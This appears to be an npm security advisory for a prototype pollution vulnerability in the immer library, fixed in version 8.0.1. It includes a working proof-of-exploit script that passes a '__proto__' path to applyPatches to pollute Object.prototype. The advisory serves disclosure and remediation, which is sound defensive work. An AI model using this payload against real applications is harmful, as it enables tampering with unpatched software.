Newts Parading Majestically
    Severity: high

    Prototype Pollution

    immer

    Overview

    Overview

    Affected versions of immer are vulnerable to Prototype Pollution.

    Proof of exploit

    const {applyPatches, enablePatches} = require("immer");
    enablePatches();
    let obj = {};
    console.log("Before : " + obj.polluted);
    applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
    // applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
    console.log("After : " + obj.polluted);
    

    Remediation

    Version 8.0.1 contains a fix for this vulnerability, updating is recommended.

    Remediation

    Upgrade to version 8.0.1 or later

    Resources

    Have content suggestions? Visit npmjs.com/support.

    Advisory timeline

    1. published

      Advisory Published
      Feb 19th, 2021
    2. reported

      Reported by Anonymous
      Feb 19th, 2021